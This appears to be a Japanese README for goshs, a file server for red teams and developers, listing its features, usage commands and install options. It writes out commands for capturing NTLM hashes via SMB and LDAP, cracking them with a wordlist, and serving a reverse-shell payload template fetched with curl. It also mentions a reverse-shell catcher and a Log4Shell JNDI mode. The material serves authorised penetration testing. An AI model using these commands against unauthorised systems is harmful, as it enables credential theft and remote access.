
レッドチームおよび開発者向けの高機能シングルバイナリファイルサーバー。 HTTP/S · WebDAV · FTP/SFTP · SMB · LDAP/S · NTLMハッシュキャプチャ · DNS/SMTPコールバック · TLS · Auth · 共有リンク。強力なpython3 -m http.serverの代替。
エンゲージメントの最中です。ファイルを転送したり、SMBハッシュを取得したり、簡単なHTTPSサーバーを立てたりする必要がある — そんなとき、python3 -m http.serverでは役不足です。
goshs は、PythonのSimpleHTTPServer以上の機能が必要だがApacheを設定したくない、そんな瞬間のために作られたシングルバイナリのファイルサーバーです。HTTP/S、WebDAV、FTP/SFTP、SMB、LDAP/S、ベーシック認証、共有リンク、DNS/SMTPコールバック、NTLMハッシュ取得+クラッキング — すべて1つのコマンドで実現します。


実際に試してみる: demo.goshs.de

# 現在のディレクトリをポート8000で配信
goshs
# HTTPS(自己署名)とベーシック認証で配信
goshs -s -ss -b user:password
# SMBハッシュを取得
goshs -smb -smb-domain CORP
# LDAP認証情報とNTLMハッシュを取得(オプションでワードリストによるクラッキング)
goshs -ldap
goshs -ldap -ldap-wordlist /usr/share/wordlists/rockyou.txt
# DNSコールバックを捕捉し、メールを受信
goshs -dns -dns-ip 1.2.3.4 -smtp -smtp-domain your-domain.com
# 2時間後に自己破壊
goshs --ttl 2h
# 対話型ターミナルダッシュボードで実行(ヘッドレスSSHセッションに最適)
goshs --tui
# ダウンロード時にコールバックホスト/ポートを自動入力するペイロードを配信
goshs -i 10.10.14.7 --template --tpl-var LPORT=4444
# レンダリング結果を取得: curl 'http://10.10.14.7:8000/rev.ps1?tpl'
詳細なドキュメントは docs.goshs.de をご覧ください
goshsはbash、fish、zsh用のタブ補完をインストールできます:
goshs --completion bash
goshs --completion fish
goshs --completion zsh
macOSでHomebrewを使用している場合、正しいHomebrewパスが自動的に使用されます。 インストール後、コマンドは正確な有効化手順を出力します。例:
source ~/.local/share/bash-completion/completions/goshs
バンドルされたWebアセットはコミット済みなので、通常のビルドはそのまま動作します:
git clone https://github.com/goshs-labs/goshs.git
cd goshs
go build -o goshs .
JavaScriptまたはSCSSソースを変更する場合は、esbuildとsassをインストールして、先にアセットを再ビルドしてください:
make generate
go build -o goshs .
goshsをより安全にしてくれた素晴らしいコントリビューターの皆さんです ❤️
Discordコミュニティに参加して、つながりを始めましょう。
このプロジェクトをPythonで書かれた彼のプロジェクト updog で刺激してくれた sc0tfree に特別な感謝を捧げます。
| 📁 ファイル操作 | ダウンロード(HTTP Rangeによる再開・シーク対応)、アップロード(ドラッグ&ドロップ、POST/PUT)、削除、一括ZIP、QRコード |
| 🔌 プロトコル | HTTP/S、WebDAV、FTP/SFTP、SMB、LDAP/S |
| 🔒 認証とセキュリティ | ベーシック認証、証明書認証、TLS(自己署名、Let's Encrypt、カスタム証明書)、IPホワイトリスト、ファイルベースのACL |
| ⚙️ サーバーモード | 読み取り専用、アップロード専用、削除不可、サイレント、インビジブル、CLIコマンド実行、TTL自己破壊 |
| 🔗 共有リンク | トークンベースの共有、ダウンロード制限、時間制限 |
| 🎯 コラボレーション / CTF | ライブチームチャット(Markdown、絵文字+:ショートコード:自動提案、画像貼り付け、ファイルアップロード、リアクション、メッセージ編集、オプションのディスク永続化 — Web ↔ TUI共有)、DNSサーバー、SMTPサーバー、SMB NTLMハッシュ取得+クラッキング、LDAP認証情報取得+NTLMハッシュクラッキング(Log4Shell用JNDIモード)、リダイレクトエンドポイント、リバースシェルキャッチャー+ペイロードジェネレーター |
| 🧩 ペイロードテンプレート | 配信ファイル内の{{.LHOST}}/{{.LPORT}}+カスタム--tpl-var値をオンデマンドでレンダリング(?tpl) |
| 🔔 統合 | Webhook、localhost.runによるトンネリング、設定ファイル、JSON API、mDNS |
| 🖥️ TUIダッシュボード | 対話型フルスクリーンターミナルダッシュボード。HTTP、DNS、SMB、LDAP、SMTP、リバースシェル、チームチャット用のライブペイン。ターミナルからシェルをアタッチ・アップグレード可能 |
| 🛠️ その他 | ダーク/ライトテーマ、チームチャット、自己更新、ログ出力、ファイル埋め込み、権限降格 |
| 方法 |
|---|
| 🐧 curl | sh | curl -sSfL https://goshs.de/install.sh | sh |
| 🦫 Go | go install goshs.de/goshs/v2@latest |
| 🐉 Kali & Parrot OS | sudo apt install goshs |
| 🎗️ Arch Linux (AUR) | yay -S goshs-bin |
| 🖤 BlackArch | pacman -S goshs |
| 🏔️ Alpine Linux (edge) | apk add goshs |
| 🫙 Snap | snap install goshs |
| 🎩 Fedora / RHEL (COPR) | dnf copr enable goshs-labs/goshs && dnf install goshs |
| 🦎 openSUSE | sudo zypper install goshs |
| ❄️ Nix / NixOS | nix-env -iA nixpkgs.goshs |
| 🍺 Homebrew | brew install goshs |
| 🪟 Scoop | scoop bucket add extras && scoop install extras/goshs |
| 🪟 winget | winget install GoshsLabs.Goshs |
| 🍫 Chocolatey | choco install goshs |
| 🐳 Docker | docker run --rm -it -p 8000:8000 -v "$PWD:/pwd" goshs-labs/goshs:latest -d /pwd |
| 📦 リリース | GitHub Releasesからダウンロード |
![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | wooseokdotkim | Guilhem7 |